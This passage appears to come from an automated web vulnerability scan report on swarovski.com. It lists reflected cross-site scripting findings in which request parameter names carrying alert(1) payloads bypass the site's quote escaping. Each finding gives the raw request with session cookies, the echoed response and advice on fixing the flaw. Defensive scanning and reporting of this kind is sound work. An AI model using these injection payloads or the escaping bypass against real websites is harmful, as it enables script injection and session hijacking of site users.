GET /Web_US/en/scs_login?dd204\'%3balert(1)//123e81b987d=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... FS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_CrystalSociety-ViewMemberArea', query: 'dd204\\';alert(1)//123e81b987d=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.33. http://www.swarovski.com/Web_US/en/termsconditions [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/termsconditions
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 459db\'%3balert(1)//46732fbedec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 459db\\';alert(1)//46732fbedec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/termsconditions?459db\'%3balert(1)//46732fbedec=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... SHOP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Footer-ViewAGB', query: '459db\\';alert(1)//46732fbedec=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.34. http://www.swarovski.com/Web_US/en/tracking [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/tracking
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c897\'%3balert(1)//af399b9afcc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c897\\';alert(1)//af399b9afcc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/tracking?9c897\'%3balert(1)//af399b9afcc=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... CO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_CustomerService-ViewOrderTracking', query: '9c897\\';alert(1)//af399b9afcc=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.35. http://www.swarovski.com/Web_US/en/youropinion [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/youropinion
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe18a\'%3balert(1)//9e8dab4e476 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe18a\\';alert(1)//9e8dab4e476 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/youropinion?fe18a\'%3balert(1)//9e8dab4e476=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... inity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Footer-ViewYourOpinion', query: 'fe18a\\';alert(1)//9e8dab4e476=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.36. http://www.swarovski.com/index [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/index
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cced\'%3balert(1)//289f8243fc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7cced\\';alert(1)//289f8243fc6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /index?7cced\'%3balert(1)//289f8243fc6=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... nfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_LandingPage-ViewPage', query: '7cced\\';alert(1)//289f8243fc6=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.37. http://www.swarovski.com/is-bin/INTERSHOP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SPAG_Footer-ViewSiteMap [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf3b9\'%3balert(1)//9d724181c51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf3b9\\';alert(1)//9d724181c51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /is-bin/INTERSHOP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SPAG_Footer-ViewSiteMap?bf3b9\'%3balert(1)//9d724181c51=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... .enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Footer-ViewSiteMap', query: 'bf3b9\\';alert(1)//9d724181c51=1'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcdef'}, // path for getting ...[SNIP]...
1.38. http://www.swarovski.com/is-bin/INTERSHOP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SPAG_ViewSearch-AdvancedSearch [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc818\'%3balert(1)//663935cb33b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cc818\\';alert(1)//663935cb33b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /is-bin/INTERSHOP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SPAG_ViewSearch-AdvancedSearch?cc818\'%3balert(1)//663935cb33b=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... ty/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_ViewSearch-AdvancedSearch', query: 'cc818\\';alert(1)//663935cb33b=1'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcdef'}, // path for getting ...[SNIP]...
1.39. https://www.swarovski.com/Web_US/en/giftcertificate [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.swarovski.com
Path:
/Web_US/en/giftcertificate
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99911\'%3balert(1)//3c0ed9ce103 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99911\\';alert(1)//3c0ed9ce103 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/giftcertificate?99911\'%3balert(1)//3c0ed9ce103=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... FS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_MyAccount-ViewGiftCertificate', query: '99911\\';alert(1)//3c0ed9ce103=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.40. https://www.swarovski.com/Web_US/en/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.swarovski.com
Path:
/Web_US/en/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e72d\'%3balert(1)//6d5a55c111 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e72d\\';alert(1)//6d5a55c111 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/login?4e72d\'%3balert(1)//6d5a55c111=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... nity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_MyAccount-LoginRegister', query: '4e72d\\';alert(1)//6d5a55c111=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.41. https://www.swarovski.com/Web_US/en/ogcbuy [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.swarovski.com
Path:
/Web_US/en/ogcbuy
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec68d\'%3balert(1)//b09073b3015 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec68d\\';alert(1)//b09073b3015 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/ogcbuy?ec68d\'%3balert(1)//b09073b3015=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... OP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_OGCPage-ViewPage', query: 'ec68d\\';alert(1)//b09073b3015=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.42. https://www.swarovski.com/Web_US/en/orderhistory [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.swarovski.com
Path:
/Web_US/en/orderhistory
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d51a\'%3balert(1)//a4a452171b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d51a\\';alert(1)//a4a452171b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/orderhistory?8d51a\'%3balert(1)//a4a452171b9=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
